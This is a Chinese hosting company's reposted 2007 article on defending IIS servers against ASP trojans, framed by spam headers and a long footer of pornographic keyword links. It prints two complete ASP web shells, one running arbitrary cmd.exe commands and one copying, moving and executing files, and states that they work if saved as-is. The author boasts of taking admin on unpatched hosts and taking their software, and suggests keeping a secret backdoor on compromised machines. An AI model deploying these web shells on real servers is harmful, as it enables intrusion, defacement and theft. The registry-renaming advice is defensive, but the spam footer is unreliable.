国产福利视频在线观看福利-国产福利视频情侣视频-国产福利视频-国产福利美女福利视频免费看-国产鲁鲁视频在线播放-国产噜噜噜精品免费

 
售房快車 售房客車 房屋租賃 牽線搭橋 供求信息 南陽人才網 文藝沙龍
 
域名注冊 虛擬主機 云服務器 企業云郵箱 網站制作 網站推廣 無紙辦公 成功案例
   
服務熱線:0377-63392646 13782137062
虛擬主機  
魔天记 忘语 小说,已完结小说排行榜,我欲封天 耳根 小说
· 網 絡 學 院
·友情鏈接 更多>>>
標題:防范ASP木馬

 
隨著ASP 技術的發展,網絡上基于ASP技術開發的網站越來越多,對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基于ASP技術的木馬后門,也越來越多,而且功能也越來越強大。由于ASP它本身是服務器提供的一貢服務功能,所以這種ASP腳本的木馬后門,不會被殺毒軟件查殺。被黑客們稱為"永遠不會被查殺的后門"。由于其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防范和清除,為我們的網管人員提出了更高的技術要求。下面我結合個人的經驗,談一下對兩款比較典型的ASP 木馬的防范方法,希望對大家能夠有所幫助。

  以下是第一款木馬的代碼:
  <title>ASP Shell</title>
  <%@ Language=VBScript %>
  <%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile
  On Error Resume Next
  -- create the COM objects that we will be using --
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  -- check for a command that we have posted --
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then
  -- Use a poor mans pipe ... a temp file --
  szTempFile = "C:\" & oFileSys.GetTempName( )
  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  End If
  %>
  <HTML>
  <BODY>
  <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=".CMD" size=45 value="<%= szCMD %>">
  <input type=submit value="執行命令">
  </FORM>
  <PRE><%
  If (IsObject(oFile)) Then
  -- Read the output from our command and remove the temp file --
  On Error Resume Next
  Response.Write Server.HTMLEncode(oFile.ReadAll)
  oFile.Close
  Call oFileSys.DeleteFile(szTempFile, True)
  End If
  %>
  </BODY>
  </HTML>
  運行后如下圖: 在命令行里輸入DIR命令點執行就可以查看目錄了!!它可以使用各種DOS命令,如:copy、net、netstat等。
  但是它的默認執行權限只有GUEST,也就是IUSR_COMPUTER用戶的執行權限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那么你就有管理員權限了。這一款木馬的特點是,使用很方便。幾乎就想當于DOS命令行窗口xx作一樣。但是如果服務器限制了FSO(無組件上傳),那么它是沒有辦法使用了。還有就是在服務器以后增加的虛擬主機里也沒有辦法使用。只能在"默認 Web 站點"里使用,所以它相對的適用范圍較窄。
  對于防范方法讓我們看一下它的代碼就知道了:
  Set oScript = Server.CreateObject("WSCRIPT.SHELL") "建立了一個名為oScript的WSCRIPT.SHELL對象,用于命令的執行"
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
  上面三行代碼創建了WSCRIPT.SHELL、WSCRIPT.NETWORK、Scripting.FileSystemObject三個對象,我們只要在注冊表中把控制WSCRIPT.SHELL對象的項改名或刪除就可以了。如下圖:值得注意的是:我們應該把"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"這兩項都要改名或刪除。因為如我們只修改"WSCRIPT.SHELL"項的話。那么黑客們只要把代碼修改如下:Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") 這個后門木馬就又可以執行了。
  大家可能已經想到了,我們在對"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"改名時,一定要不容易被黑客們猜到,因為例如:你把"WSCRIPT.SHELL"改成了"WSCRIPT.SHELL888"。黑客們只要把代碼相應的改成:Set oScript = Server.CreateObject("WSCRIPT.SHELL888"),木馬程序就又可以執行了。還有就修改了注冊表以后要重起WEB服務,設置才會有效。
  接下來讓我們再來看下一款ASP后門木馬程序的代碼:
  <%response.write "<font size=6 color=red>一次只能執行一個xx作</font>" %>
  <%response.write now()%><BR>程序所在的物理路徑:
  <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
  <html>
  <title>asps shell.application backdoor </title>
  <body>
  <form action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=text value="<%=szCMD %>"> 輸入要瀏覽的目錄<br>
  <input type=text name=text1 value="<%=szCMD1 %>">
  copy
  <input type=text name=text2 value="<%=szCMD2 %>"><br>
  <input type=text name=text3 value="<%=szCMD3 %>">
  move
  <input type=text name=text4 value="<%=szCMD4 %>"><br>
  路徑:<input type=text name=text5 value="<%=szCMD5 %>">
  程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>
  <input type=submit name=sb value=發送命令>
  </form>
  </body>
  </html>
  <%
  szCMD = Request.Form("text") 目錄瀏覽
  if (szCMD <> "") then
  set shell=server.createobject("shell.application") 建立shell對象
  set fod1=shell.namespace(szcmd)
  set foditems=fod1.items
  for each co in foditems
  response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
  next
  end if
  %> <%
  szCMD1 = Request.Form("text1") 目錄拷貝,不能進行文件拷貝
  szCMD2 = Request.Form("text2")
  if szcmd1<>"" and szcmd2<>"" then
  set shell1=server.createobject("shell.application") 建立shell對象
  set fod1=shell1.namespace(szcmd2)
  for i=len(szcmd1) to 1 step -1
  if mid(szcmd1,i,1)="\" then
  path=left(szcmd1,i-1)
  exit for
  end if
  next
  if len(path)=2 then path=path & "\"
  path2=right(szcmd1,len(szcmd1)-i)
  set fod2=shell1.namespace(path)
  set foditem=fod2.parsename(path2)
  fod1.copyhere foditem
  response.write "command completed success!"
  end if
  %> <%
  szCMD3 = Request.Form("text3") 目錄移動
  szCMD4 = Request.Form("text4")
  if szcmd3<>"" and szcmd4<>"" then
  set shell2=server.createobject("shell.application") 建立shell對象
  set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1
  if mid(szcmd3,i,1)="\" then
  path=left(szcmd3,i-1)
  exit for
  end if
  next if len(path)=2 then path=path & "\"
  path2=right(szcmd3,len(szcmd3)-i)
  set fod2=shell2.namespace(path)
  set foditem=fod2.parsename(path2)
  fod1.movehere foditem
  response.write "command completed success!"
  end if
  %>
  <%
  szCMD5 = Request.Form("text5") 執行程序要指定路徑
  szCMD6 = Request.Form("text6")
  if szcmd5<>"" and szcmd6<>"" then
  set shell3=server.createobject("shell.application") 建立shell對象
  shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
  response.write "command completed success!"
  end if
  %>
  執行后如下圖:要查看目錄,只要輸入相應的目錄,點發送命令就可以了。如下圖:
  這個木馬程可以完成文件的COPY、MOVE,和執行程序。但很多命令都不能用,例如:del、net、netstat等。這個木馬程的功能隨然簡單,但是用它來黑一個網站是足夠了。比如,我們可以把網站的首頁MOVE到其它地方,然后我們再COPY一個同名的黑客網頁進去,就行了。
  最要命的是這個木馬適用于任何虛擬主機之中,也就是說我只要是服務器中的一個虛擬空間的用戶,我就可以傳這個木馬上去,并用它來修改其它任何用戶的主頁。所以如果哪些提供虛擬空間的服務商沒有打補丁的話,那真是死定了。
  然而在我的實踐中發現,中國很多的虛擬空間服務商,特別是一些小型的服務商都沒有打補丁。我利用這一漏洞拿到了很多虛擬空間服務器的ADMIN,然后好心的幫他們補上漏洞。當然我也得到了我想得到的東西——很多好的軟件和代碼。我現在用著的很多ASP程序就是從他們那上面偷下來,太難聽了,應該說DOWN下來的才對。
  言歸正傳,我們應該怎樣來防范這個ASP后門木馬程序呢?讓我們看一下它其中的這一句代碼:set shell=server.createobject("shell.application"),跟剛才的方法一樣,如下圖:
  我們只要把"shell.application"項和"shell.application.1"項改名或刪除就可以了。記住了,如果是改名,要改得復雜一點,不要讓黑客們一下就猜到了。順便說一句,如果是你給肉雞打補丁最好是改名,并把名字記下來,這樣也就成為自己一個隱密的后門了。最后對這兩款ASP木馬后門,以及如何防范ASP木馬后門做一下總結:第一款木馬功能上強大一些, 但適用范圍窄,需要FSO支持也就是"Scripting.FileSystemObject"項的支持。第二款木馬雖然功能上少一些,但它創建的是"shell.application"對象。在任何虛擬主機中都適用。(這一點危害確實太大了,提供支持ASP空間的管理員們,你們可得注意了!)
  其實跟據對上面兩款ASP木馬后門的防范,大家可能已經想到了,對于ASP后門木馬的防范,我們只要在注冊表中把"shell.application"、"WSCRIPT.SHELL"等危險的腳本對象(因為它們都是用于創建腳本命令通道的)進行改名或刪除,也就是限制系統對"腳本SHELL"的創建,ASP木馬也就成為無本之木、無米之炊,運行不起來了。
  注:以上代碼復制保存為ASP文件就可以直接使用了。(僅用于測試,不要搞破壞,后果自負!:)

  作者:佚名 來源:網絡

 

點擊[5108]次  發布日期: 2007-3-26 21:41:53    發布人:中國開網
:上一篇
  下一篇:

返回首頁 |公司簡介 |開網招聘 |支付說明 |行業新聞 | 聯系方式 |客服中心| 相關咨詢|廣告服務 |郵箱登錄

豫公網安備 41130302000019號


豫ICP備2024042951號

南陽市開網網絡技術有限公司◎0377-63392646

業務專線: 0377-63392646 1378217062

總部地址: 河南省南陽市車站路146號新城百樂大廈13樓12室

業務①QQ:401853676 客服①QQ:776288762 

Email:xuejinfu@kyxxw.com  

Copyright © 2025 南陽市開網網絡技術有限公司 ◇版權所有

中國開網旗下網站:
信息版:www.rh-holdings.com.cn 
網絡版:www.cnkw.cn
成賣網:www.cmai.cn
開網PC手機微信APP小程序五合一網站
www.0377it.com
www.0377it.cn
主站蜘蛛池模板: 麻豆黑色丝袜jk制服福利网站-麻豆精品传媒视频观看-麻豆精品传媒一二三区在线视频-麻豆精选传媒4区2021-在线视频99-在线视频a | 欧美一级视频精品观看-欧美一级三级-欧美一级日韩一级亚洲一级va-欧美一级日韩一级亚洲一级-中文字幕精品一区-中文字幕精品视频在线观看 | 国产偷啪视频一区-国产偷啪-国产偷窥女洗浴在线观看亚洲-国产偷窥-无套啪啪-无套大战白嫩乌克兰美女 | 亚洲青草,日本成人a,欧美视频一区二区在线观看,国产精品porn,欧美国产精品va在线观看,精品一区二区三区的国产在线观看 | 久草免费在线观看-久草免费在线色站-久草免费在线视频-久草免费资源-天堂网中文在线-天堂网中文字幕 | 亚洲综合在线观看视频-亚洲综合在线观看一区-亚洲综合在线观看一区www-亚洲综合在线视频-亚洲综合在线网-亚洲综合在线一区 | av资源每日更新网站在线-av资源免费每日更新-av资源在线-av资源在线播放-av资源在线播放韩国-av资源在线观 | 国产高清在线精品一区在线-国产高清在线精品一区二区三区-国产高清在线精品一区a-国产高清在线精品一区-日韩在线a视频免费播放-日韩在线2020专区 | 国产成人精品一区二区视频免费-国产成人精品一区二区视频-国产成人精品一区二区三在线观看-国产成人精品一区二区三在-国产成人精品一区二区三区小说-国产成人精品一区二区三区无码 | 欧美黑寡妇香蕉视频-欧美国产一区视频在线观看-欧美国产一区二区三区-欧美国产一区二区-国产成人精品第一区二区-国产成人精品2021欧美日韩 | aaak7美国发布站-a v 在线视频 亚洲免费-99综合色-99在线这精品视频-国产成人综合洲欧美在线-国产成人综合在线观看网站 | 中文无码熟妇人妻av在-中文无码视频三区四区在线观看-中文无码视频-中文无码肉感爆乳在线-中文无码日韩欧免费视频-中文无码日韩欧毛 | 欧美视频综合-欧美视频中文字幕-欧美视频在线观在线看-欧美视频在线观看网站-直接观看黄网站免费视频-正在播放久久 | 亚洲尹人-亚洲伊人久久综合影院2021-亚洲伊人久久在-亚洲伊人久久网-免费网站在线观看人数在哪里看的-免费网站在线观看国产v片 | 国产久操视频-国产久草视频-国产久热精品-国产久热香蕉在线观看-青青青青娱乐-青青青青在线成人视99 | 91在线视频在线-91在线视频在线观看-91在线丨亚洲-91在线天堂-91在线无码精品秘 入口91-91在线无码精品秘蜜桃 | 五月天在线观看免费视频播放,人人草人人,色视频综合,狠狠色婷婷丁香六月,五月婷婷六月丁香综合,开心激情综合网 | 日韩a级片-日韩a级片视频-日韩a级片在线观看-日韩a级一片-日韩a级一片在线观看-日韩a级在线 | 老司机亚洲精品影院-老司机午夜在线视频-老司机午夜影院-老司机午夜网站-亚洲国产精品热久久2022-亚洲国产精品毛片∧v卡在线 | 99riav视频-99riav视频国产在线看-99ri精品视频在线观看播放-99ri在线-99rv精品视频在线播放-99r视频里面只有精品 | 欧美人与性动交a欧美精品-欧美人与物另类-欧美人与牲动交a欧美精品-欧美人与禽片免播放-国产福利在线观看永久免费-国产福利在线播放 | 午夜久久久久久-午夜久久久-午夜精品在线免费观看-午夜精品影院-国产日韩久久-国产日韩精品一区在线观看播放 | 双性人bbwsex-双性花蒂产奶h-双性大奶肉文-双性产奶-国产福利在线观看 极品美女-国产福利在线播放 | 青青青青青青草-青青青青青青-青青青青青国产免费手机看视频-青青青青青国产免费观看-青青青青青草原-青青青青青草 | 亚洲人成电影青青在线播放-亚洲人成www在线播放-亚洲人成a在线网站-亚洲人av高清无码-久操久-久操-9c.lu | 国产a一级-国产a网-国产a视频精品免费观看-国产a视频-国产a免费观看-国产a毛片 | 国产探花在线视频-国产探花在线观看-国产探花视频在线观看-国产探花视频-无人区在线观看免费完整版免费-无人区在线观看免费视频国语 | 欧美日韩国产在线成人网,成人免费一级片,在线观看国产一区,国产麻豆精品免费密入口,国产欧美日韩在线,在线视频观看国产 | 麻豆高潮AV久久久久久久-麻豆高清免费国产一区-麻豆国产13p-麻豆国产96在线日韩麻豆-麻豆国产AV尤物网站尤物-麻豆国产精品AV色拍综合 | 国产精品v欧美精品v日本精品动漫-国产精品porn-国产精品jizzjizz-国产精品h片在线播放-热久久伊人-热久久亚洲 | 激情www,国产成人爱情动作片在线观看,五月天婷婷在线观看高清,欧美美女福利视频,五月激激激综合网色播免费,国产亚洲欧美日韩综合另类 | 一区二区国产精品-一区二区高清在线观看-一区二区高清在线-一区二区成人国产精品-九九视频精品全部免费播放-九九视频国产 | 国产精品高清免费网站-国产精品高清2021在线-国产精品福利在线播放-国产精品福利影院-色黄视频在线观看-色狐视频 | 国产一区二区高清,久久亚洲私人国产精品va,日韩精品观看,国产高清美女一级毛片久久,国产区亚洲区,日本久久香蕉一本一道 | 国产免费区-国产免费久久精品-国产免费久久-国产免费福利-鸥美性生交xxxxx久久久-欧洲黄色毛片 | av资源每日更新网站在线-av资源免费每日更新-av资源在线-av资源在线播放-av资源在线播放韩国-av资源在线观 | 爆乳无码一区二区三区-爆乳熟妇一区二区三区霸乳-爆乳熟妇一区-爆乳少妇在办公室在线观看-爆乳护士一区二区三区在线播放-白丝一区二区三区 | 伦理片天堂eeuss影院-伦理片秋霞免费影院-伦理片飘花手机在线-伦理片飘花免费影院-最新2017年韩国伦理片在线-最新 国产 精品 精品 视频 | 欧美人成在线视频-欧美人成一本免费观看视频-欧美人xxxxxbbbb-欧美区在线-在线不卡免费视频-在线播放周妍希国产精品 | 欧美成人免费xxx大片,91在线视频一区,精品日韩一区二区三区,欧美日韩 在线播放,欧美在线aa,亚洲专区路线一路线二天美 | 日韩成人A片一区二区三区-日韩成人黄色片-日韩成人在线视频-日韩吃奶摸下AA片免费观看-日韩大片免费看-日韩大片在线观看 |